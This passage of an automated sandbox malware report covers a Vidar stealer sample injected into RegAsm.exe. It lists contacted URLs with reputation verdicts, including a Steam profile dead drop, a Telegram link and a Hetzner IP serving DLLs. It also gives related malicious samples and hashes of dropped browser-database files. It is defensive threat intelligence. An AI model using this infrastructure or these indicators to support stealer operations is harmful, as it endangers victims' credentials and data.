                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp, GDAAKF.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://steamcommunity.coRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmptrue
                    • Sophos S4: illegal phishing domain
                    • Avira URL Cloud: phishing
                    unknown
                    https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGARegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/stats/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallGDAAKF.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchJEGHDA.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://t.me/k0monofile.exe, 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199686524322/inventory/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/profiles/76561199686524322/badgesRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    http://www.sqlite.org/copyright.html.RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoJEGHDA.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://95.217.240.101/softokn3.dllKRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://store.steampowered.com/76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exeRegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ac.ecosia.org/autocomplete?q=JEGHDA.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://95.217.240.101/vRegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drfalse
                    • URL Reputation: safe
                    unknown
                    https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199686524322[1].htm.3.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
23.194.234.100 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
95.217.240.101 | unknown | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1442218
Start date and time: 2024-05-15 20:35:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/25@1/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 105
• Number of non-executed functions: 217
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
Time | Type | Description
20:35:57 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    23.194.234.100file.exeGet hashmaliciousVidarBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        file.exeGet hashmaliciousVidarBrowse
                          UJzMs6lsyF.exeGet hashmaliciousVidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                CDssd7jEvY.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    7qAKRRMho6.exeGet hashmaliciousGCleaner, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        95.217.240.101file.exeGet hashmaliciousVidarBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                          • 23.194.234.100
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          mod01_pdf.lnkGet hashmaliciousUnknownBrowse
                                          • 23.65.44.84
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 104.106.57.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousPrivateLoader, PureLog Stealer, Vidar, zgRATBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                          • 184.85.65.125
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 23.195.238.96
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 104.105.90.131
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          AKAMAI-ASUShttps://drive.google.com/file/d/11Nff_nSTj-qAFgshL0mhor7fJP9kHxH0/view?usp=drive_webGet hashmaliciousQuasarBrowse
                                          • 23.196.176.131
                                          FW Server Notice Heatherg System Alert Notification..emlGet hashmaliciousHTMLPhisherBrowse
                                          • 23.43.173.38
                                          https://us22.mailchimp.com/mctx/clicks?url=https%3A%2F%2Fnaport.com.br%2Ftech&xid=b07540652e&uid=212127442&iid=43a204bb7e&pool=cts&v=2&c=1715276467&h=633aae99b87aa03fcfcd4d0ee69f8d68261dff9fc69fccbb3cfe374e7c574b94Get hashmaliciousUnknownBrowse
                                          • 72.246.62.115
                                          https://1drv.ms/f/s!Au13bCs5C-oDg80wq6Iti50hSMW3rA?e=vlTf9zGet hashmaliciousUnknownBrowse
                                          • 23.196.176.131
                                          http://salecinask.liveGet hashmaliciousUnknownBrowse
                                          • 23.221.214.135
                                          http://salecinask.liveGet hashmaliciousUnknownBrowse
                                          • 184.26.116.50
                                          support.Client.exe.zipGet hashmaliciousScreenConnect ToolBrowse
                                          • 23.193.120.112
                                          https://gamma.app/docs/Shared-Notice-and-Email-Disclaimers-6aqig6w4unouiqo?mode=present#card-cngszya3osgcwyjGet hashmaliciousHTMLPhisherBrowse
                                          • 23.67.64.198
                                          https://erzincanaktastaksi.com/20/w2_2023_Up.zipGet hashmaliciousXWormBrowse
                                          • 23.202.101.159
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 23.194.234.100
                                          HETZNER-ASDEPPR & PARTNER Pape Rauh #U201cAttached document to review & sign#U201d with you.emlGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                          • 78.46.157.212
                                          https://download.filezilla-project.org/client/FileZilla_3.67.0_win64_sponsored2-setup.exeGet hashmaliciousUnknownBrowse
                                          • 49.12.121.47
                                          file.exeGet hashmaliciousVidarBrowse
                                          • 95.217.240.101
                                          x15Wvov9Bj.elfGet hashmaliciousMiraiBrowse
                                          • 188.34.238.142
                                          YCrL9vbZ3g.elfGet hashmaliciousMiraiBrowse
                                          • 46.4.110.27
                                          Aqua.x86.elfGet hashmaliciousMiraiBrowse
                                          • 144.79.222.198
                                          Xlrfx.batGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          Order List 300572024.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          new order 20240508.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          Shipping Advice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 135.181.215.231
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
                                          file.exeGet hashmaliciousPrivateLoader, VidarBrowse
                                          • 95.217.240.101
file.exe | malicious | PrivateLoader, PureLog Stealer, Vidar, zgRAT
• 95.217.240.101
file.exe | malicious | Clipboard Hijacker, PrivateLoader, Vidar
• 95.217.240.101
.pdf.scr.exe | malicious | CobaltStrike
• 95.217.240.101
.pdf.scr.exe | malicious | CobaltStrike
• 95.217.240.101
file.exe | malicious | PrivateLoader, Vidar
• 95.217.240.101
37f463bf4616ecd445d4a1937da06e19
Justificante pago 80923089.exe | malicious | GuLoader
• 23.194.234.100
SecuriteInfo.com.Win32.SpywareX-gen.21792.30077.dll | malicious | Unknown
• 23.194.234.100
SecuriteInfo.com.Win32.SpywareX-gen.19771.22491.dll | malicious | Unknown
• 23.194.234.100
SecuriteInfo.com.Win32.SpywareX-gen.21792.30077.dll | malicious | Unknown
• 23.194.234.100
SecuriteInfo.com.Win32.SpywareX-gen.19771.22491.dll | malicious | Unknown
• 23.194.234.100
file.exe | malicious | Amadey
• 23.194.234.100
V#U2550DEOS.EXE | malicious | Brontok
• 23.194.234.100
LCS-155-44 01_General_Purchase_Order_Terms_and_Conditions.vbs | malicious | AgentTesla, GuLoader
• 23.194.234.100
file.exe | malicious | Vidar
• 23.194.234.100
20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.exe | malicious | GuLoader
• 23.194.234.100
Match
  Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\GHIJJEGDBFII\mozglue.dll
  HaxexQ5EjD.exe | malicious | Mars Stealer, Stealc, Vidar
  file.exe | malicious | Vidar
  40UAEu1Kpt.exe | malicious | LummaC, CryptOne, GCleaner, Glupteba, Mars Stealer, PrivateLoader, PureLog Stealer
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, PureLog Stealer, Vidar, zgRAT
  file.exe | malicious | Clipboard Hijacker, PrivateLoader, Vidar
  WcBJX1H1hg.exe | malicious | Mars Stealer, PrivateLoader, Stealc, Vidar
C:\ProgramData\GHIJJEGDBFII\freebl3.dll
  HaxexQ5EjD.exe | malicious | Mars Stealer, Stealc, Vidar
  file.exe | malicious | Vidar
  40UAEu1Kpt.exe | malicious | LummaC, CryptOne, GCleaner, Glupteba, Mars Stealer, PrivateLoader, PureLog Stealer
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, Vidar
  file.exe | malicious | PrivateLoader, PureLog Stealer, Vidar, zgRAT
  file.exe | malicious | Clipboard Hijacker, PrivateLoader, Vidar
  WcBJX1H1hg.exe | malicious | Mars Stealer, PrivateLoader, Stealc, Vidar
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):126976
                                                                                  Entropy (8bit):0.47147045728725767
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):98304
                                                                                  Entropy (8bit):0.08235737944063153
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):5242880
                                                                                  Entropy (8bit):0.037963276276857943
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.017262956703125623
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                  Category:dropped
                                                                                  Size (bytes):159744
                                                                                  Entropy (8bit):0.7873599747470391
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):0.8180424350137764
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                  Category:dropped
                                                                                  Size (bytes):28672
                                                                                  Entropy (8bit):2.5793180405395284
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):9571
                                                                                  Entropy (8bit):5.536643647658967
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                  Malicious:false
